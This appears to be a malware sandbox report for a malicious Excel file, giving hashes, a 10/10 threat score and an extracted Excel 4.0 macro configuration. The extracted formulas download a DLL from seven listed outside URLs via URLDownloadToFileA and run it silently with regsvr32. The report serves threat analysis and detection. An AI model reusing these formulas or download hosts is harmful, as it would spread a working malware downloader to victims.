General

  • Target

    58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562

  • Size

    18KB

  • Sample

    240909-1tmylascpk

  • MD5

    8762ebe9984b59c40d367382f168e840

  • SHA1

    efe05b3e0184dda4f69be941c13b11ad0219b354

  • SHA256

    58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562

  • SHA512

    131d069291c8b3433e7b61971684e0209ee5e6da87e7678ce6827050768c96d00121f1f94842b88fd42bdb3856d069845f34a53e65b99a89e54c5465594a1ab0

  • SSDEEP

    384:uCJj6woT13+oZ7lI+IKeVBZqt7crLqp77x5qZghI0qAztDM/:uC93oxrZ72+/ecmqp7q2hI0rt2

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0)
    =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D26<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
    =RETURN()

Targets

    • Target

      58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562

    Score
    3/10
